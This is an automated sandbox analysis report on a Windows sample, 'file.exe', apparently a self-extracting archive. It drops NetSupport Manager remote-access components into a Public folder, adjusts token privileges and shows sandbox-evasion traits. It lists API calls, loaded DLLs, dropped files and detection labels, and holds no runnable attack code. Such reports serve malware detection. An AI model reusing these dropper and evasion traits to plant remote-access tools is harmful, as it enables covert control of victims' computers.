                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABBB900_2_00007FF75AABBB90
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB5B600_2_00007FF75AAB5B60
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD8C1C0_2_00007FF75AAD8C1C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD89A00_2_00007FF75AAD89A0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABC96C0_2_00007FF75AABC96C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC39640_2_00007FF75AAC3964
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC2AB00_2_00007FF75AAC2AB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAA1AA40_2_00007FF75AAA1AA4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE5AF80_2_00007FF75AAE5AF8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB1A480_2_00007FF75AAB1A48
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AADFA940_2_00007FF75AADFA94
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABAF180_2_00007FF75AABAF18
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE20800_2_00007FF75AAE2080
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC8DF40_2_00007FF75AAC8DF4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD07540_2_00007FF75AAD0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC2D580_2_00007FF75AAC2D58
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC53F00_2_00007FF75AAC53F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC21D00_2_00007FF75AAC21D0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABF1800_2_00007FF75AABF180
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAAA3100_2_00007FF75AAAA310
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAAC2F00_2_00007FF75AAAC2F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAA72880_2_00007FF75AAA7288
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB126C0_2_00007FF75AAB126C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAA48400_2_00007FF75AAA4840
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AADC8380_2_00007FF75AADC838
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE25500_2_00007FF75AAE2550
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABB5340_2_00007FF75AABB534
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAA76C00_2_00007FF75AAA76C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110733B02_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110295902_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11061C902_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110330102_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111632202_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1102B5F02_2_1102B5F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111674852_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110454F02_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1101B7602_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111258B02_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1101BBA02_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11087C602_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110700902_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110804802_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1115E9802_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1101C9C02_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110088AB2_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11050D802_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11146450 appears 615 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 110278E0 appears 47 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1116F010 appears 37 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11029450 appears 1003 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 111603E3 appears 41 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1105DD10 appears 291 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11081BB0 appears 44 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11164010 appears 32 times
                                Source: file.exe, 00000000.00000003.2039840028.0000027C55C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs file.exe
                                Source: classification engineClassification label: mal84.rans.evad.winEXE@3/12@1/2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAAB6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF75AAAB6D8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,2_2_1109D440
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,2_2_1109D4D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,2_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAC8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF75AAC8624
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,2_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeMutant created: NULL
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\Public\Netstat\client32.iniJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: file.exeStatic file information: File size 2283549 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000002.00000002.3890464582.000000006D021000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000002.00000002.3890900771.000000006FBB2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000002.00000000.2041890788.0000000000262000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000002.00000002.3890806531.000000006F9D5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,2_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6879453Jump to behavior
                                Source: file.exeStatic PE information: section name: .didat
                                Source: file.exeStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE5156 push rsi; retf 0_2_00007FF75AAE5157
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE5166 push rsi; retf 0_2_00007FF75AAE5167
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1116F055 push ecx; ret 2_2_1116F068
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11169F49 push ecx; ret 2_2_11169F5C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D022D80 push eax; ret 2_2_6D022D9E
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,2_2_11127E10
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,2_2_11139090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,2_2_1115B1D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,2_2_11113290
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,2_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,2_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,2_2_110254A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,2_2_110258F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,2_2_11023BA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,2_2_11024280
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11112670 IsIconic,GetTickCount,2_2_11112670
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,2_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,2_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,2_2_110C0BB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,2_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,2_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110B8200 Sleep,ExitProcess,2_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 420Jump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 7939Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_2-72354
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_2-74237
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_2-77130
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_2-76731
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_2-76870
                                Source: C:\Users\Public\Netstat\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-72894
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 5.1 %
